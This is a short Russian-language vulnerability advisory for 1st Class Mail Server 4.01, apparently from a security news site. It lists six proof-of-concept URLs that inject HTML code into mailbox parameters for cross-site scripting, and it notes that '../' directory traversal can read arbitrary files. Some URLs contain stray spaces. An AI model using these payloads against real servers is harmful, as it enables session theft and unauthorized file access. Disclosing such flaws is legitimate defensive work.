Программа: 1st Class Mail Server 4.01 

Несколько уязвимостей обнаружено в 1st Class Mail Server. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может выполнить XSS нападение. 

http://[host]/AUTH=[some_value]/user/viewmail.tagz? Site=www.hack.gr&Mailbox=3&MessageIndex=[html_code ]>
http://[host]/AUTH=[some_value]/user/?Site=www.ha ck.gr&Mailbox=[html_code]
http://[host]/AUTH=[some_value]/user/members.tagz? Site=www.hack.gr&Mailbox=[html_code]
http://[host]/AUTH=[some_value]/user/general.tagz?Si te=www.hack.gr&Mailbox=[html_code]
http://[host]/AUTH=[some_value]/user/advanced.tagz? Site=www.hack.gr&Mailbox=<[html_code]>
http://[host]/AUTH=[some_value]/user/list.tagz?Site=w ww.hack.gr&Mailbox=[html_code]

Также удаленный пользователь может использовать символы обхода каталога ‘../’ чтобы просмотреть произвольные файлы на системе с привилегиями Web сервера.



Оставить мнение